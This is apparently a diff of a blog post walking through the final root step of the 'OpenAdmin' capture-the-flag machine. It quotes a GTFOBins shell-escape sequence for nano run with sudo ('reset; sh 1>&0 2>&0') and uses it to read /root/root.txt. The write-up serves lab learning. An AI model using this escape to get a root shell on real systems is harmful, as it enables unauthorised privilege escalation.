d3b4g/leonids/_posts/openadmin.md

 Reading root.txt is pretty straight forward, this technique is already well document in GTFBIN

+> t can be used to break out from restricted environments by spawning an interactive system shell.
+>nano
+>^R^X
+>reset; sh 1>&0 2>&0

 sudo /bin/nano /opt/priv.
-Then we type <CTRL>+R in order to read a file.
+Then we type <CTRL>+R /root/root.txt in order to read a file.

+OpenAdmin is rooted!